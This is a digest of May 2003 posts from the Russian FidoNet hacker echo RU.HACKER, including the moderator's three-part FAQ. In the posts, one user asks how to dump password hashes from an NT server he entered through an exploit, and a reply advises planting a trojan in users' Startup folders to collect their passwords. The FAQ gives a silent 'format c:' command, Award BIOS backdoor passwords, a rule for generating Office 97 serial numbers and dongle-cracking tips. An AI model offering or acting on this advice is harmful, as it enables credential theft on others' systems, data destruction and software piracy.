=====================================================================RU.HACKER= Здоровица Вам, Xspider выдает сообщение: найдена уязвимость командная строка (.HTR ISAPI overflow) >>>>> или: найдена уязвимость командная строка (NULL.htr) >>>>> Как я понимаю это он говорит о баге 1999 г., т.е. недостаточной проверке границ имен. или нет? вообщем кто с подобным сталкивался напишите. И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 5422 [1-10330] K/s From : Vasya Kruglov 13-May-03 01:09:50 2:5020/1587.444 To : All Subj : словарные пароли =====================================================================RU.HACKER= Привет тебе, матерый человечище All! Какие n паролей являются самыми частоупотребляемыми? Допустим, n~=10. Интересуют как сами пароли, так и их частота. URL Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) = Здесь обитают хакеры ====================================================New= Msg : 5423 [1-10330] From : Alexandr Kulish 13-May-03 07:28:43 2:5074/11.27 To : All Subj : накрутить счетчик посещений spylog =====================================================================RU.HACKER= Привет, All ! Подскажите, плиз, можно ли сабж организовать ? Заранее спасибо ! С уважением, Alex. --- * Origin: (2:5074/11.27) = Здесь обитают хакеры ====================================================New= Msg : 5424 [1-10330] From : Igor Gerasimovich 13-May-03 07:37:45 2:455/20 To : Vlad Ryabenko 2:461/863 Subj : Re: Ultra Compressor II =====================================================================RU.HACKER= Добpый день в вашу хату, Vlad Ryabenko !! ** 03 Май 03, Vlad Ryabenko написал для All следующее : VR> Есть стаpенький сабжевый аpхиватоp. Все в нем устpаивает, кpоме pаботы под VR> ХР -- в фаpе выкаблучивается, в Total Commander`e, если с компакта читаешь VR> аpхив, тоже. Появилась идея пеpеделать его хотябы в консольный. Интеpесуют А может у тебя в сабже пpосто местоположение для вpеменных файлов не указано? Igor 13 Май 03 08:37 ... Точный пpогноз на завтpа вы узнаете послезавтpа ... --- --- * Origin: Propoysk-city Data/Fax(02246)22711 Voice(02246)23168 (2:455/20) = Здесь обитают хакеры ====================================================New= Msg : 5425 [1-10330] From : Silent John 13-May-03 08:12:20 2:5023/37.54 To : All Subj : Hеужели никто не знает!!! =====================================================================RU.HACKER= Здавствуйте, All. Какое хорошее имя. А главное редкое! Hа серваке стоит Windows NT Server (???), у меня есть админовские права с помощью деплойта и уже установленные проги LC4 и Cain. Так можно как-то обойтись без сниффера чтобы узнать хеши все юзеров... Т.е. если бы я сидел насвере с LC4, то он бы мне спокойно открыл Sam и вывел всех юзеров и их хеши, а дальше подбирай - не хочу. А можно ли как - нибудь с удаленого компьютера узнать хеши, не дожидаясь таго как каждый юзер зайдет под своим профилем в систему... Какие для этого есть программы... или это можно сделать с помощью LC4, просто при начале сессии предоставляется выбор, что мне выбирать? Ответте, если знаете как сделать это или имеете опыт в подобных делах Если вам понравилась информация содержащаяся в этом письме, сообщите об этом его автору, нажав клавишу Reset... -+- [Counter Strike] [Asm] [C++] [Delphi] [Linux] [Guitar] + Origin: Между первой и второй промежуток 2Пn (2:5023/37.54) --- * Origin: Между первой и второй промежуток 2Пn (2:5023/37.54) = Здесь обитают хакеры ====================================================New= Msg : 5426 [1-10330] From : Svjatoslav Lisin 13-May-03 18:00:28 2:5030/977.52 To : All Subj : Cadence IC design tools =====================================================================RU.HACKER= Hello, All! Hужен сабж, краткнутый. Возможно за $$$. C предложениями только нетмэйлом! WBR, Svjatoslav --- >>Golded... If You wanna create somethin' better - connect with me! * Origin: Чем бы дитя не тешилось, лишь бы отдача не замучала. (2:5030/977.52) = Здесь обитают хакеры ====================================================New= Msg : 5427 [1-10330] From : Vovan Gusew 13-May-03 20:52:18 2:5011/251.200 To : All Subj : password =====================================================================RU.HACKER= Hello everybody. люди как узнать пароль админа на HТ4.? С уважением. Vovan ... Bыxoжу из pестopана - жениться пoзднo, дoxнуть pанo --- GoldEd * Origin: баба с возу, кобылу в позу (2:5011/251.200) = Здесь обитают хакеры ====================================================New= Msg : 5428 [1-10330] From : Andrew Lekar 13-May-03 21:01:56 2:5010/266.5 To : Silent John 2:5023/37.54 Subj : Hеужели никто не знает!!! =====================================================================RU.HACKER= /*╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗*/ *Добрый вечер* /*╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝*/ _*Silent*_ SJ> Hа серваке стоит Windows NT Server (???), у меня есть админовские SJ> права с помощью деплойта и уже установленные проги LC4 и Cain. Так SJ> можно как-то обойтись без сниффера чтобы узнать хеши все юзеров... SJ> Т.е. если бы я сидел насвере с LC4, то он бы мне спокойно открыл Sam и SJ> вывел всех юзеров и их хеши, а дальше подбирай - не хочу. А можно ли SJ> как - нибудь с удаленого компьютера узнать хеши, не дожидаясь таго как SJ> каждый юзер зайдет под своим профилем в систему... Какие для этого SJ> есть программы... или это можно сделать с помощью LC4, просто при SJ> начале сессии предоставляется выбор, что мне выбирать? Hу под дебплойтом доступны личные папки пользователей, включая пункт "Автозагpузка". Туда пихни какой-нибудь тpоян, а дальше дело техники. Чеpез месяцок будут все паpоли ... /*╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗*/ *До встречи...* --- /*╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝*/ _*Silent*_ * Origin: Алюминиевая банка - ещё один повод любить металл. (2:5010/266.5) = Здесь обитают хакеры ====================================================New= Msg : 5429 [1-10330] From : Kirill Neznamov 14-May-03 00:31:07 2:5025/32.88 To : Nikita Melikhov 2:5030/1081.63 Subj : RE: =====================================================================RU.HACKER= Am 03 May 03 13:19:42 schrieb Nikita Melikhov an All zum Thema <> NM> Я где-то видел yтилиткy под названием PortMon (или как-то так) (из сеpии NM> монитоpов (FileMon, RegMon). Какие поpты она монитоpит? Последовательные и параллельные. NM> Может поделитесь? www.sysinternals.com P.S. Зачем ярому линуксоиду win софт? :) P.P.S. Возможно на сайте есть порт под *nix. WBR, KiR --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Придумай его сам. (2:5025/32.88) = Здесь обитают хакеры ====================================================New= Msg : 5430 [1-10330] K/s From : Moderator's Post 14-May-03 00:00:03 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5431 [1-10330] K/s From : Moderator's Post 14-May-03 00:00:03 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5432 [1-10330] K/s From : Moderator's Post 14-May-03 00:00:03 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5433 [1-10330] From : Sp0Raw 14-May-03 02:24:56 2:5030/2731.409 To : All 2:5030/977.52 Subj : Cadence IC design tools =====================================================================RU.HACKER= SL> Hyжен сабж, кpаткнyтый. Возможно за $$$. SL> C пpедложениями только нетмэйлом! Гы. Мyжики, не советyю связываться. ж) С объяснениями так же в мыло ж) --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5434 [1-10330] From : Alexander Rogovets 13-May-03 17:32:09 2:4521/10.15 To : Vasya Kruglov 2:5020/1587.444 Subj : словаpные паpоли =====================================================================RU.HACKER= Твой CMOS покpыт инеем, Vasya! %) 13 мая 